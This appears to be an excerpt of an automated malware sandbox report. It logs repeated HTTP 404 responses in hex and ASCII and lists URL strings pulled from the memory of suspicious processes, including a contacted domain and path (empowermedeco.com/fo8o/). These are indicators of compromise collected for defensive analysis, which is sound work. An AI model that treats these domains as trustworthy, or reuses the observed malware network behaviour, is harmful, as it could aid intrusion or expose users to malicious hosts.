  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Mon, 02 Dec 2024 13:31:40 GMT
  Connection: close
  Content-Length: 315
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Mon, 02 Dec 2024 13:31:43 GMT
  Connection: close
  Content-Length: 315
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Mon, 02 Dec 2024 13:31:45 GMT
  Connection: close
  Content-Length: 315
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=us-ascii
  Server: Microsoft-HTTPAPI/2.0
  Date: Mon, 02 Dec 2024 13:31:48 GMT
  Connection: close
  Content-Length: 315
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:33:42 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:33:45 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:33:48 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:33:50 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:33:58 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:34:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:34:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:34:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4606386701.000000000561E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4606386701.000000000561E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
